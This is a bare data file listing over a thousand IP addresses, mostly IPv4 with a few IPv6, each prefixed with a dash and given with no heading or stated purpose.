-123.57.209.96 -37.12.206.189 -23.229.227.166 -149.56.184.141 -103.204.200.51 -121.40.155.13 -174.137.63.117 -178.32.28.163 -173.213.96.139 -105.247.204.66 -23.235.244.214 -74.208.98.229 -185.174.28.108 -114.215.154.233 -54.251.48.236 -93.89.112.239 -65.60.43.184 -182.61.29.222 -103.9.76.124 -94.23.171.110 -220.194.201.130 -51.254.5.215 -69.162.84.116 -186.16.29.149 -91.210.189.141 -120.27.120.106 -103.100.157.219 -45.61.115.20 -199.193.248.16 -112.218.96.29 -115.29.203.117 -172.247.51.122 -123.206.216.102 -50.30.38.146 -198.136.58.53 -87.239.28.198 -58.135.80.214 -69.65.38.52 -117.48.214.224 -139.162.249.137 -209.126.105.6 -175.107.201.3 -23.244.241.53 -202.85.217.64 -118.193.156.17 -62.112.9.77 -50.116.3.187 -211.152.37.243 -192.99.78.2 -110.164.156.215 -202.91.248.39 -198.50.234.190 -95.213.196.68 -200.85.165.226 -172.247.51.114 -45.61.112.47 -188.134.67.82 -23.104.135.240 -221.10.126.130 -114.55.7.107 -104.196.200.86 -172.247.51.223 -198.2.212.188 -211.13.206.137 -64.64.12.47 -2a01:7e00::f03c:91ff:fed5:21e3 -47.95.226.158 -117.41.149.188 -104.203.82.191 -23.104.135.211 -23.104.135.211 -174.129.1.116 -172.247.51.41 -122.214.243.75 -192.119.13.172 -45.61.112.59 -65.60.59.116 -104.237.2.88 -46.105.50.17 -153.125.232.81 -54.223.108.20 -104.165.60.79 -107.191.39.38 -65.60.43.182 -192.144.80.85 -193.106.218.4 -119.23.234.68 -89.111.13.217 -142.4.119.81 -82.135.151.142 -66.228.58.202 -93.170.136.51 -23.224.115.99 -81.18.201.171 -45.77.9.202 -132.148.6.255 -117.232.127.53 -211.99.222.190 -45.40.137.11 -172.247.51.20 -185.66.141.219 -120.79.91.163 -219.153.71.194 -23.225.239.53 -185.174.28.132 -31.210.53.87 -85.25.148.181 -122.225.97.11 -93.115.243.2 -103.254.14.130 -173.236.111.162 -120.24.226.84 -104.207.40.179 -78.140.141.241 -108.170.59.217 -23.224.242.50 -92.42.38.24 -60.205.177.242 -47.93.0.127 -121.43.189.3 -123.55.95.227 -104.203.82.238 -140.143.188.41 -192.151.202.213 -46.32.228.123 -120.27.24.226 -221.132.35.8 -37.48.66.36 -93.188.164.4 -65.111.166.5 -107.179.93.44 -122.245.29.226 -185.171.24.102 -37.187.130.172 -197.232.56.34 -161.132.216.21 -45.61.112.6 -2a01:7e00::f03c:91ff:fe6e:610b -123.207.249.148 -104.192.86.25 -185.83.147.158 -119.61.64.114 -104.203.82.155 -137.74.252.73 -193.93.221.148 -23.247.10.171 -103.100.157.230 -77.46.149.201 -45.76.185.201 -212.68.42.239 -106.14.116.154 -182.73.36.113 -107.155.95.206 -182.254.138.93 -64.34.162.106 -64.131.78.58 -211.103.155.232 -65.60.46.151 -176.31.210.43 -149.202.28.15 -103.70.226.58 -123.103.15.10 -211.148.220.130 -119.28.133.148 -142.4.107.97 -222.186.3.31 -104.128.228.125 -92.222.117.176 -125.253.127.140 -101.200.35.252 -114.67.63.142 -52.56.55.29 -183.60.207.135 -119.81.70.151 -49.212.202.16 -209.126.96.80 -46.4.143.18 -112.13.90.5 -58.57.93.36 -108.61.163.180 -198.13.54.130 -96.126.105.146 -110.80.178.57 -142.4.119.88 -104.166.42.131 -47.91.109.31 -195.98.7.35 -47.92.92.44 -133.242.201.34 -153.122.84.111 -18.220.127.232 -77.77.150.15 -123.14.235.115 -24.132.64.40 -121.40.21.131 -50.23.65.11 -112.74.16.73 -89.19.17.162 -186.71.21.219 -199.167.201.140 -112.218.72.80 -121.40.99.20 -121.40.96.21 -49.212.132.110 -45.79.108.158 -220.164.24.38 -123.150.244.28 -182.92.9.172 -104.199.222.114 -82.202.160.195 -163.44.196.228 -45.32.103.42 -139.129.213.68 -133.242.125.236 -210.14.14.230 -151.248.121.20 -221.234.18.236 -5.79.106.48 -153.122.57.46 -180.106.239.216 -77.223.134.203 -106.187.91.29 -112.74.23.46 -220.164.161.96 -113.196.74.172 -164.132.41.218 -120.27.10.95 -104.154.255.201 -178.18.115.253 -185.83.147.159 -34.226.150.36 -45.76.181.245 -98.129.37.128 -119.28.100.66 -59.151.9.123 -95.211.10.132 -182.92.9.155 -103.200.22.182 -208.83.221.66 -35.161.51.202 -198.251.67.126 -172.80.123.75 -188.138.102.151 -104.239.241.26 -198.251.87.6 -67.55.106.183 -92.63.111.137 -23.224.244.39 -120.92.57.187 -119.23.151.220 -109.73.168.249 -23.88.82.44 -101.132.69.99 -89.35.6.174 -45.76.240.175 -209.188.24.27 -139.129.194.213 -103.30.245.50 -45.79.73.44 -101.200.152.253 -45.35.125.46 -66.70.198.252 -82.135.151.24 -46.182.29.5 -82.102.14.28 -222.139.156.133 -149.210.157.152 -190.57.190.190 -109.169.76.38 -194.29.155.22 -116.196.76.147 -110.173.59.19 -158.69.252.51 -23.238.18.103 -23.225.113.81 -178.32.28.170 -221.234.18.180 -112.74.58.187 -43.224.149.6 -142.4.107.84 -52.69.94.127 -118.193.232.140 -5.135.58.106 -122.129.217.14 -178.208.78.11 -222.165.222.148 -95.211.108.107 -92.241.162.3 -114.80.207.249 -157.7.245.167 -177.247.209.200 -151.80.66.74 -74.208.144.49 -178.32.89.229 -185.194.236.72 -23.244.241.102 -202.120.44.59 -123.57.41.109 -95.213.135.147 -23.225.113.76 -172.246.248.124 -149.56.151.151 -37.97.249.77 -14.215.225.236 -183.62.138.102 -112.90.226.204 -103.24.202.178 -222.186.15.73 -203.162.166.162 -201.116.51.148 -170.75.248.46 -23.225.239.154 -23.225.89.184 -138.201.19.30 -23.104.135.19 -5.135.58.120 -194.58.107.202 -212.1.214.11 -95.213.215.148 -104.203.82.102 -212.24.100.184 -112.126.91.187 -79.137.96.46 -23.88.82.40 -23.224.115.81 -23.88.82.135 -217.115.137.194 -112.124.61.214 -166.63.21.22 -64.49.226.170 -88.99.102.48 -81.4.121.65 -103.100.157.76 -115.119.206.89 -193.33.133.93 -101.201.252.94 -186.249.1.152 -82.135.148.210 -112.216.122.130 -129.154.64.233 -132.148.8.7 -144.217.64.14 -34.244.144.58 -174.142.251.253 -72.1.245.6 -115.28.81.107 -198.98.54.106 -120.55.113.199 -149.202.106.43 -79.174.65.126 -123.57.37.182 -166.78.7.120 -61.183.226.58 -120.24.100.4 -210.209.85.247 -51.254.117.216 -212.68.50.77 -91.227.16.112 -212.158.128.85 -64.120.123.146 -54.37.143.82 -196.202.202.197 -145.239.7.205 -144.217.6.170 -23.104.135.62 -109.239.63.208 -117.27.239.165 -23.88.82.92 -119.23.139.137 -23.224.245.21 -202.144.156.12 -109.73.168.236 -192.80.147.161 -212.96.127.226 -47.92.69.25 -103.3.189.232 -46.4.10.106 -185.61.150.206 -211.162.68.158 -118.69.195.109 -96.126.122.212 -23.88.82.139 -74.207.242.123 -90.189.193.2 -52.20.99.155 -54.233.183.61 -198.12.156.162 -59.110.54.92 -60.191.221.95 -107.179.93.55 -119.29.203.220 -23.225.239.176 -60.205.185.178 -72.1.245.85 -163.43.83.9 -104.238.189.147 -45.32.116.222 -77.68.239.100 -123.150.244.24 -74.84.130.125 -58.61.157.173 -174.143.243.178 -172.247.51.225 -23.225.239.156 -202.102.137.47 -121.42.162.124 -54.165.66.202 -45.32.125.144 -23.104.135.52 -108.161.139.94 -185.83.145.204 -45.77.206.64 -120.76.129.189 -104.207.44.83 -89.42.24.125 -184.154.69.92 -68.185.57.47 -66.85.186.59 -200.115.192.51 -101.37.87.190 -121.43.198.12 -66.175.220.234 -51.255.5.151 -77.222.142.57 -45.114.94.175 -62.112.9.78 -120.27.138.84 -139.224.70.120 -18.231.141.210 -23.224.115.141 -5.196.228.15 -23.225.89.72 -104.168.145.172 -123.56.236.104 -112.74.27.186 -42.123.126.12 -67.55.93.25 -101.200.186.61 -31.131.21.114 -103.80.134.217 -47.93.126.12 -142.4.119.102 -113.141.27.226 -104.200.134.219 -13.114.180.174 -64.120.123.173 -188.120.247.245 -60.12.212.149 -91.102.160.204 -185.83.147.168 -166.63.21.74 -116.236.231.169 -198.98.120.136 -125.253.127.181 -80.255.93.236 -192.80.147.111 -37.187.2.122 -101.132.193.107 -177.69.27.52 -45.56.101.45 -117.88.149.50 -172.247.51.222 -39.108.100.92 -37.123.99.67 -198.50.169.49 -92.43.117.200 -121.18.238.152 -188.120.251.146 -139.129.98.252 -139.199.169.128 -192.169.153.179 -142.4.119.123 -114.55.116.240 -213.32.50.139 -40.125.203.117 -121.199.5.74 -119.29.226.145 -35.229.183.109 -89.163.131.107 -23.224.115.243 -78.110.50.138 -120.76.230.78 -199.33.126.36 -120.24.180.186 -52.54.210.148 -132.148.19.184 -64.118.95.123 -95.142.37.221 -111.230.142.114 -173.254.231.52 -62.141.32.143 -178.33.15.64 -223.99.195.183 -23.224.245.16 -47.92.29.30 -142.4.107.210 -5.135.143.144 -82.98.146.198 -202.4.105.218 -23.104.135.95 -74.117.154.195 -45.114.94.54 -88.99.92.90 -211.143.45.239 -89.165.0.181 -120.24.233.152 -121.43.183.42 -103.59.166.123 -23.104.135.241 -149.154.68.40 -58.80.200.10 -104.207.154.45 -92.53.117.7 -69.13.210.189 -80.48.229.19 -78.128.1.202 -142.44.201.221 -208.66.78.194 -185.66.142.52 -171.216.65.223 -1.30.20.42 -115.28.161.123 -185.66.141.230 -45.77.145.235 -65.18.120.23 -14.212.248.246 -108.179.226.62 -178.33.15.92 -115.28.244.237 -119.23.225.188 -121.40.95.115 -172.110.29.251 -54.36.181.22 -198.200.41.61 -120.27.130.189 -123.57.172.204 -132.148.16.238 -118.184.77.190 -121.54.161.102 -101.200.128.37 -118.244.206.34 -221.10.127.53 -40.76.60.85 -208.85.7.94 -153.122.32.52 -123.57.228.23 -121.199.37.121 -124.202.152.249 -121.40.180.104 -166.63.21.14 -45.252.248.158 -39.106.9.152 -104.207.52.76 -198.200.41.3 -203.162.81.250 -144.168.74.130 -217.113.63.198 -172.104.139.250 -47.96.169.144 -104.250.135.15 -96.44.179.245 -198.143.141.251 -149.56.106.83 -204.11.236.218 -52.26.144.135 -46.166.180.56 -35.154.222.138 -118.89.56.134 -91.121.153.141 -69.65.56.184 -65.39.182.237 -190.108.84.189 -144.168.69.154 -118.184.178.163 -103.29.70.160 -200.137.130.120 -103.30.5.18 -218.251.227.19 -123.57.166.117 -167.114.228.248 -190.216.215.92 -87.98.139.42 -162.13.179.172 -58.67.156.11 -52.86.19.236 -125.88.178.58 -107.6.221.116 -133.242.8.171 -185.98.63.136 -198.58.105.207 -23.244.241.3 -89.232.78.20 -91.237.109.47 -94.229.165.112 -45.114.94.192 -178.32.190.93 -85.30.248.154 -104.207.44.71 -120.24.80.74 -195.138.64.34 -2401:b80:136::131 -45.76.192.239 -198.251.67.128 -37.247.99.75 -139.196.243.86 -216.117.173.51 -66.240.233.2 -23.244.190.74 -188.125.162.214 -167.114.54.91 -216.69.172.19 -187.95.62.59 -209.126.75.184 -195.175.227.177 -121.8.143.202 -188.122.71.80 -23.23.139.207 -158.69.36.3 -45.61.114.6 -72.1.245.44 -182.92.234.10 -103.78.88.125 -209.20.73.93 -45.125.239.169 -40.115.30.10 -65.181.121.196 -5.255.86.63 -120.27.115.140 -54.94.227.168 -175.41.198.161 -120.27.119.177 -192.121.25.149 -107.6.212.190 -139.129.160.38 -139.162.115.104 -101.132.43.80 -86.104.177.46 -23.224.244.7 -58.84.16.25 -120.25.247.31 -45.252.249.163 -118.184.43.237 -182.92.176.49 -210.86.231.52 -185.181.211.14 -211.148.220.132 -23.104.135.146 -82.135.148.114 -153.122.38.233 -103.100.157.87 -45.56.116.38 -72.51.30.39 -45.77.38.243 -37.187.153.53 -45.63.111.115 -119.23.74.35 -185.27.132.211 -52.67.160.36 -23.224.115.110 -45.79.196.165 -175.170.191.58 -23.225.239.22 -203.74.150.122 -2600:3c00::f03c:91ff:fe89:35e8 -145.239.47.234 -203.171.234.48 -176.58.122.204 -42.121.17.163 -166.62.98.171 -210.26.106.115 -210.26.106.115 -185.4.72.40 -202.183.165.44 -122.2.133.120 -103.200.5.36 -77.92.144.16 -58.60.185.52 -157.52.240.86 -216.131.127.105 -23.225.239.142 -119.59.102.70 -183.230.204.32 -222.223.27.30 -213.140.213.235 -185.174.28.114 -192.95.3.255 -54.91.28.15 -172.247.51.123 -133.18.5.232 -64.34.179.251 -123.59.146.254 -212.27.53.206 -103.41.110.250 -82.146.46.175 -89.163.247.164 -139.196.113.86 -185.191.228.180 -60.172.229.165 -112.74.196.47 -202.168.148.247 -85.214.108.209 -121.43.199.26 -54.39.20.87 -82.177.87.106 -221.208.170.162 -103.35.56.102 -47.88.139.143 -64.235.222.37 -173.214.110.234 -139.162.27.170 -23.244.241.86 -120.25.70.54 -206.190.153.76 -172.104.25.243 -49.85.107.4 -118.190.154.2 -45.79.142.88 -120.236.237.90 -23.225.113.48 -13.231.203.51 -104.145.233.36 -37.59.144.226 -89.187.86.202 -39.106.104.30 -45.61.112.25 -13.112.9.230 -185.68.180.134 -185.29.120.3 -89.111.181.242 -185.162.145.97 -103.100.157.50 -107.155.198.132 -39.109.1.9 -107.191.61.0 -185.187.161.147 -23.244.190.158 -184.72.89.42 -37.252.102.53 -183.62.20.75 -93.188.165.118 -103.100.157.18 -198.176.54.8 -120.25.220.216 -58.71.104.244 -101.200.170.193 -45.61.113.44 -211.152.33.29 -123.207.50.196 -61.164.153.206 -139.162.70.9 -95.211.244.74 -184.107.230.75 -197.85.190.229 -45.124.85.252 -51.254.143.78 -52.24.14.50 -118.190.70.152 -185.210.93.101 -45.32.113.15 -122.114.76.50 -47.96.249.166 -103.234.143.152 -89.107.128.224 -69.147.241.178 -198.137.202.190 -111.67.197.173 -124.192.224.227 -185.114.192.229 -120.27.211.164 -192.169.196.103 -119.136.145.163 -209.95.39.85 -50.116.55.64 -1.192.90.228 -47.93.144.135 -217.28.67.4 -115.29.145.203 -144.168.71.140 -188.116.7.25 -144.217.108.215 -109.201.149.179 -153.120.20.53 -139.129.22.27 -37.99.152.28 -218.60.94.6 -45.35.94.238 -66.228.59.201 -213.219.38.250 -101.200.213.227 -195.216.166.16 -121.43.113.244 -89.185.228.56 -108.163.177.29 -120.26.248.9 -95.218.206.90 -101.200.134.227 -103.27.5.88 -54.174.39.176 -104.251.238.144 -112.74.130.88 -123.56.87.2 -104.203.82.53 -107.6.212.189 -188.165.229.88 -66.254.176.69 -182.16.110.14 -103.213.251.71 -173.236.115.80 -118.98.234.91 -45.35.125.54 -169.54.217.80 -121.41.29.169 -171.244.10.98 -187.226.188.189 -70.36.125.48 -172.246.101.252 -158.69.3.252 -216.250.105.238 -139.196.219.153 -101.201.54.121 -67.19.21.141 -103.227.179.197 -94.102.49.219 -109.73.168.234 -119.148.19.227 -218.27.198.209 -78.110.61.118 -23.244.241.35 -181.143.218.179 -23.224.242.41 -23.244.190.62 -117.120.49.240 -137.59.48.186 -162.221.187.4 -45.32.113.24 -98.129.37.135 -79.174.65.41 -173.214.178.40 -101.200.38.206 -192.126.119.28 -39.106.251.186 -122.97.128.144 -45.35.125.48 -34.231.14.248 -2001:470:5992::aaaa -23.239.8.131 -36.110.217.228 -23.104.135.180 -123.56.129.248 -79.124.64.16 -101.200.39.204 -35.186.154.94 -200.195.131.75 -78.140.172.211 -101.200.122.78 -50.17.224.238 -202.56.124.122 -5.39.71.28 -108.61.151.35 -185.66.140.47 -166.63.21.19 -211.155.95.140 -213.32.41.75 -103.27.239.136 -45.61.113.56 -67.228.13.66 -118.190.20.144 -96.126.113.128 -161.202.191.132 -23.92.179.42 -104.130.217.61 -120.26.217.27 -114.215.87.148 -160.153.36.201 -121.40.248.239 -153.127.106.245 -109.234.162.89 -144.217.162.113 -5.10.87.204 -218.153.6.43 -121.40.79.128 -94.103.150.155 -114.4.105.56 -106.14.209.36 -104.239.248.5 -66.228.41.192 -158.69.243.181 -61.222.1.37 -101.132.112.21 -94.126.62.31 -64.235.53.103 -45.77.158.221 -219.234.3.42 -115.29.242.190 -23.224.242.2 -50.7.103.59 -34.201.101.200 -108.61.247.38 -166.63.21.69 -113.107.205.26 -182.254.129.57 -101.200.88.141 -121.40.168.201 -193.104.170.132 -61.184.253.119 -216.144.236.182 -101.201.220.160 -173.0.63.209 -104.224.202.166 -120.77.215.178 -47.89.36.95 -217.113.1.194 -198.56.193.131 -158.69.224.34 -88.99.4.104 -192.36.142.129 -182.92.157.3 -104.250.135.28 -211.103.226.18 -45.76.185.171 -190.11.244.163 -192.99.31.253 -139.217.3.151 -161.202.21.218 -153.120.50.217 -23.225.89.37 -195.42.162.105 -91.198.44.12 -176.31.244.10 -23.104.135.56 -89.163.155.222 -200.203.183.81 -173.224.211.75 -123.57.238.70 -176.114.202.113 -115.201.179.230 -43.251.116.184 -2a01:7e00::f03c:91ff:fe6e:d1ad -216.189.157.83 -208.110.64.229 -95.213.197.202 -23.225.0.169 -78.11.5.105 -120.24.44.187 -210.149.187.123 -109.73.168.209 -107.180.78.235 -116.62.229.41 -88.212.238.110 -91.215.216.4 -101.200.133.241 -119.29.0.207 -114.55.41.69 -45.77.79.85 -112.33.7.15 -23.224.115.153 -125.69.73.243 -133.242.48.126 -54.67.69.230 -222.56.80.53 -82.185.61.244 -122.114.126.21 -54.64.190.30 -120.25.177.226 -181.112.222.74 -218.198.127.140 -52.204.214.219 -199.83.49.230 -208.38.172.54 -45.79.103.192 -54.215.240.141 -178.33.249.239 -192.163.253.220 -121.40.150.253 -114.215.201.194 -116.62.25.89 -66.228.54.37 -120.77.46.34 -103.15.50.19 -43.230.202.82 -104.207.44.79 -116.236.231.185 -103.100.157.172 -76.11.82.74 -125.253.127.123 -150.138.119.176 -106.15.196.192 -64.120.123.241 -218.244.137.11 -69.60.111.60 -120.24.252.101 -139.196.195.2 -89.33.247.23 -178.19.125.2 -119.29.95.188 -43.230.145.18 -204.12.255.170 -136.0.69.213 -119.23.17.24 -124.204.49.202 -185.153.36.35 -2a01:7e00::f03c:91ff:fe6e:d7f0 -172.246.101.42 -23.88.82.37 -45.61.113.47 -104.223.117.209 -114.67.233.166 -103.37.1.109 -121.40.223.45 -77.67.61.186 -50.116.63.130 -188.165.1.179 -176.31.105.45 -188.132.219.10 -47.93.81.25 -46.32.229.104 -95.211.193.52 -181.174.189.130 -23.88.82.147 -43.226.40.221 -78.137.112.224 -185.85.204.196 -69.197.177.229 -166.63.21.15 -45.77.38.220 -168.235.104.140 -221.224.81.83 -72.1.245.69 -106.14.2.66 -65.60.5.85 -104.207.40.175 -116.255.138.242 -23.225.89.70 -112.121.168.13 -37.59.18.107 -172.110.9.117 -101.200.182.206 -23.225.113.125 -62.75.168.16 -45.61.115.2 -23.225.0.242 -192.99.149.134 -203.29.27.99 -116.255.201.38 -166.62.85.100 -121.196.203.73 -198.207.210.21 -218.251.227.21 -45.33.12.4 -120.27.160.83 -182.61.107.182 -118.192.22.77 -155.94.205.253 -122.114.95.101 -45.56.95.112 -115.29.204.161 -47.90.47.112 -106.186.17.245 -62.176.2.210 -182.16.47.154 -54.175.66.217 -123.127.41.165 -104.207.139.154 -172.246.101.103 -107.165.11.124 -47.90.66.239 -5.135.199.226 -45.61.112.4 -166.63.21.45 -114.215.116.85 -185.55.79.16 -203.195.152.240 -68.168.114.194 -31.172.132.67 -82.98.129.131 -62.160.70.229 -123.57.142.207 -106.185.25.105 -185.187.161.158 -123.56.116.80 -182.254.208.216 -155.94.156.80 -103.200.5.102 -66.254.189.87 -186.101.222.172 -72.1.245.16 -121.40.120.185 -31.24.24.8 -52.4.202.115 -96.47.226.235 -123.232.109.134 -120.26.37.243 -110.172.240.194 -124.232.143.135 -120.24.93.232 -14.23.93.115 -61.8.43.114 -122.215.240.61 -101.200.32.50 -104.243.37.67 -194.58.58.226 -59.110.228.36 -54.152.94.174 -101.37.171.103 -43.230.200.71 -108.161.133.210 -54.67.7.233 -45.114.94.186 -91.121.50.202 -122.49.35.157 -68.168.114.198 -192.80.147.219 -185.85.75.3 -92.43.117.198 -70.36.125.36 -23.244.190.146 -23.224.115.96 -182.254.209.220 -192.80.147.48 -42.62.25.75 -167.114.76.96 -5.135.188.49 -79.98.25.218 -104.203.82.244 -213.136.65.192 -89.163.246.214 -104.203.82.165 -211.99.229.4 -94.53.198.211 -45.63.83.99 -103.100.157.45 -120.24.66.179 -23.104.135.36 -120.25.88.180 -113.70.36.29 -149.202.133.16 -217.112.92.134 -23.224.115.229 -112.126.69.54 -14.23.44.66 -198.57.135.13 -183.81.161.154 -150.129.42.138 -62.210.105.128 -149.202.220.139 -120.55.82.248 -185.87.48.12 -85.117.35.84 -101.37.203.142 -84.22.110.174 -121.42.178.125 -5.196.119.144 -123.57.133.30 -121.41.128.36 -120.25.206.202 -107.190.233.78 -23.225.0.250 -198.55.108.109 -101.99.68.50 -166.63.21.36 -2a01:7e00::f03c:91ff:fe6e:1efa -188.132.219.3 -172.110.10.95 -104.165.37.227 -188.120.227.100 -123.206.86.152 -62.112.9.85 -45.32.242.67 -120.79.9.101 -198.89.126.22 -69.117.40.124 -116.255.197.116 -173.231.111.29 -198.61.226.82 -198.50.194.84 -104.165.47.167 -86.104.177.103 -124.128.234.6 -222.128.119.228 -31.171.249.92 -221.6.167.90 -151.80.171.220 -54.164.69.70 -103.41.120.60 -97.74.238.80 -37.59.143.147 -37.187.38.58 -45.79.1.211 -23.234.26.34 -139.162.158.124 -91.102.162.76 -198.200.41.21 -107.155.114.181 -120.77.201.165 -66.7.196.234 -173.193.29.240 -185.114.192.39 -45.77.177.183 -91.121.29.143 -23.88.82.134 -198.16.54.36 -184.107.164.130 -172.247.51.9 -217.147.91.104 -166.63.21.9 -45.77.147.232 -104.254.24.3 -169.45.92.196 -95.211.137.129 -68.169.52.56 -173.192.196.108 -69.168.237.98 -121.199.13.177 -103.20.189.123 -172.246.101.51 -77.120.123.171 -54.89.150.183 -54.153.5.93 -216.127.151.249 -91.90.17.21 -82.135.148.138 -200.91.9.52 -219.128.243.101 -176.58.121.228 -195.56.240.89 -119.42.149.178 -185.149.111.130 -35.227.81.18 -104.199.153.60 -104.207.44.104 -123.207.72.214 -101.226.241.15 -148.251.162.132 -212.89.224.99 -72.167.184.78 -106.2.1.170 -96.44.179.253 -64.131.72.61 -211.21.218.59 -43.239.110.4 -92.255.75.234 -37.59.129.67 -87.73.130.185 -49.4.68.98 -23.225.89.174 -136.0.69.126 -83.135.223.106 -91.121.51.106 -23.244.190.36 -103.24.1.112 -103.37.163.135 -79.98.150.2 -192.237.200.173 -212.68.42.159 -103.45.106.246 -103.90.241.88 -173.236.115.131 -95.43.242.178 -87.98.156.22 -54.223.164.243 -114.55.111.33 -142.54.236.77 -204.152.202.140 -86.104.177.92 -219.129.237.205 -136.0.69.12 -74.208.43.235 -122.114.186.203 -192.80.147.38 -107.181.251.132 -45.114.94.181 -123.57.44.182 -210.140.171.84 -175.12.56.97 -158.85.66.235 -88.99.178.11 -184.173.102.3 -59.110.136.58 -124.172.168.37 -183.111.183.55 -199.66.90.164 -39.108.221.17 -64.118.95.199 -101.37.34.118 -190.187.72.221 -124.172.232.18 -101.132.190.26 -142.4.23.229 -183.136.195.250 -120.26.137.2 -124.42.240.6 -162.144.52.39 -14.29.116.102 -103.234.21.9 -104.168.146.135 -166.63.21.98 -52.59.124.69 -139.224.221.211 -121.41.115.154 -94.102.49.122 -109.73.168.250 -23.244.241.103 -123.56.2.194 -103.100.157.167 -202.93.217.203 -114.67.49.80 -124.88.188.233 -69.174.245.230 -139.196.175.64 -192.169.213.98 -139.162.67.185 -14.18.206.187 -144.217.94.80 -120.24.219.118 -166.63.21.102 -212.109.221.143 -23.225.204.65 -120.24.75.225 -184.107.210.35 -120.26.61.144 -23.225.89.247 -47.90.60.212 -159.253.212.35 -121.43.56.158 -62.73.6.114 -120.77.236.165 -72.1.245.74 -23.225.207.26 -103.31.242.130 -101.69.207.43 -103.15.64.163 -157.7.196.234 -23.225.0.13 -153.120.50.203 -95.213.167.114 -185.174.31.212 -107.181.167.182 -118.190.32.155 -123.58.3.73 -114.55.35.214 -84.237.99.166 -45.76.178.83 -103.44.145.244 -115.249.233.106 -31.3.152.67 -23.244.190.39 -176.31.71.38 -132.148.15.237 -75.126.64.75 -118.178.85.165 -46.105.221.68 -121.43.159.86 -78.111.82.100 -140.124.230.222 -61.142.111.106 -42.157.6.8 -14.119.106.43 -192.162.112.13 -173.249.12.29 -2a01:4f8:190:1454::2 -82.146.56.3 -142.4.103.89 -211.234.117.145 -92.61.36.45 -216.131.78.203 -172.247.51.15 -75.126.201.25 -103.16.143.53 -46.38.51.166 -118.126.116.92 -139.217.14.5 -142.4.107.208 -35.165.189.204 -41.63.32.22 -121.43.145.216 -207.148.64.244 -23.225.0.244 -150.129.43.30 -172.104.178.251 -39.108.83.156 -123.207.111.127 -101.200.199.190 -104.250.150.115 -123.163.80.139 -23.225.89.134 -221.182.91.170 -177.105.167.172 -23.88.82.45 -60.166.5.119 -117.200.160.66 -65.60.22.29 -96.246.231.83 -60.191.30.190 -114.215.102.135 -182.61.61.26 -77.81.108.148 -120.77.147.169 -104.238.85.199 -45.114.94.17 -50.112.29.74 -198.251.67.129 -95.211.160.133 -5.196.128.204 -103.239.30.55 -198.143.130.114 -116.226.106.155 -34.241.254.106 -23.88.82.115 -164.52.150.241 -142.44.165.137 -23.224.115.105 -172.246.101.160 -64.150.161.125 -218.86.60.134 -103.100.157.201 -177.92.1.36 -181.52.84.59 -14.29.88.163 -176.31.49.62 -66.45.240.231 -68.64.165.124 -172.93.48.183 -39.108.127.172 -103.235.222.108 -23.224.243.29 -111.204.129.29 -112.25.174.22 -50.62.47.79 -54.204.105.104 -54.39.68.127 -23.224.115.61 -139.196.226.137 -104.165.37.248 -52.33.231.72 -185.174.30.150 -23.224.245.29 -184.72.234.171 -61.219.69.175 -5.196.225.28 -5.39.28.170 -123.56.202.18 -66.254.190.197 -172.80.123.78 -185.171.24.111 -148.251.115.13 -5.160.219.51 -103.100.157.133 -23.225.239.70 -184.154.69.94 -115.28.224.93 -72.1.245.36 -82.135.151.126 -182.138.100.126 -222.180.198.230 -223.25.100.29 -79.137.162.30 -173.255.250.51 -94.23.67.76 -65.60.5.73 -121.40.200.131 -103.100.157.145 -116.236.231.210 -45.77.46.203 -218.26.89.208 -124.128.149.6 -23.239.12.88 -103.28.38.108 -172.104.67.156 -94.140.122.146 -101.50.2.101 -39.104.108.136 -120.25.69.169 -74.208.74.113 -199.193.153.120 -59.110.14.28 -116.236.231.172 -212.90.164.203 -89.42.24.252 -173.255.193.125 -180.168.180.70 -173.236.107.50 -107.190.235.72 -193.109.144.51 -172.104.187.64 -176.31.138.35 -116.62.58.176 -120.24.93.97 -180.167.38.86 -181.114.59.242 -65.60.28.174 -1.192.219.7 -23.225.239.134 -194.8.132.8 -172.104.28.101 -93.88.74.9 -108.61.221.193 -37.49.229.37 -149.56.64.81 -103.45.102.204 -190.98.104.147 -162.248.53.66 -39.108.193.71 -51.255.148.198 -194.44.214.6 -106.14.58.230 -173.244.166.75 -31.43.33.5 -172.110.10.121 -222.186.190.77 -207.246.98.187 -115.28.135.158 -45.114.94.87 -208.85.7.91 -103.9.79.124 -27.50.17.187 -43.224.34.102 -120.55.82.132 -101.201.198.11 -185.174.28.77 -95.163.78.238 -167.114.130.13 -80.76.178.26 -221.3.189.115 -62.109.20.222 -139.196.20.43 -104.207.40.157 -120.42.2.105 -74.63.241.134 -197.232.56.97 -66.175.220.66 -23.225.89.117 -104.250.135.16 -106.14.208.240 -208.96.162.254 -114.215.170.89 -5.196.246.194 -192.232.210.176 -104.224.205.109 -133.242.156.249 -13.127.48.252 -52.187.33.64 -192.99.5.210 -45.32.42.127 -108.61.30.187 -112.74.207.214 -92.42.38.21 -104.196.22.94 -203.151.157.143 -115.29.177.105 -23.224.115.40 -192.80.147.119 -45.77.19.205 -209.236.126.67 -188.120.241.43 -182.92.232.61 -91.121.157.37 -192.185.219.145 -101.81.241.41 -173.243.113.168 -172.105.222.192 -116.90.86.124 -139.199.98.41 -67.228.232.160 -23.104.135.8 -111.231.88.60 -222.42.145.40 -216.117.130.227 -91.102.160.158 -139.129.117.101 -213.215.58.50 -23.225.239.226 -114.215.114.48 -23.244.241.148 -43.230.201.251 -209.236.126.66 -118.89.51.16 -82.135.151.149 -136.0.69.192 -52.205.135.38 -125.253.127.4 -23.225.89.149 -134.0.118.41 -46.38.162.86 -120.25.218.97 -184.154.109.170 -153.127.202.242 -5.135.5.171 -120.77.249.11 -45.76.95.229 -122.225.207.133 -218.108.53.122 -180.76.138.120 -23.244.190.168 -106.184.6.91 -23.253.105.68 -111.231.232.203 -67.225.190.65 -23.244.190.40 -172.110.27.209 -43.230.202.246 -176.223.197.53 -180.178.33.110 -61.144.88.37 -111.230.239.225 -139.224.43.16 -91.149.189.176 -208.43.219.43 -54.209.146.39 -222.122.226.147 -81.180.86.110 -65.60.22.30 -68.169.54.33 -108.61.82.140 -203.162.53.173 -173.212.198.21 -162.209.213.124 -103.100.157.162 -47.52.93.83 -103.249.104.101 -58.64.198.60 -64.118.81.246 -184.173.127.15 -202.183.165.205 -91.227.16.38 -72.167.219.63 -64.237.40.66 -107.191.60.215 -172.247.51.100 -111.13.49.1 -120.25.91.21 -222.74.96.178 -104.250.135.30 -106.75.94.198 -172.246.101.12 -60.249.18.47 -184.107.210.38 -23.224.115.232 -217.67.21.123 -112.74.112.46 -45.114.94.147 -180.128.2.246 -5.135.58.102 -23.88.82.87 -5.8.32.14 -168.235.94.29 -132.148.151.58 -45.61.112.16 -45.61.112.33 -112.74.63.83 -172.247.51.7 -120.76.138.53 -37.59.146.68 -144.168.124.5 -54.37.228.178 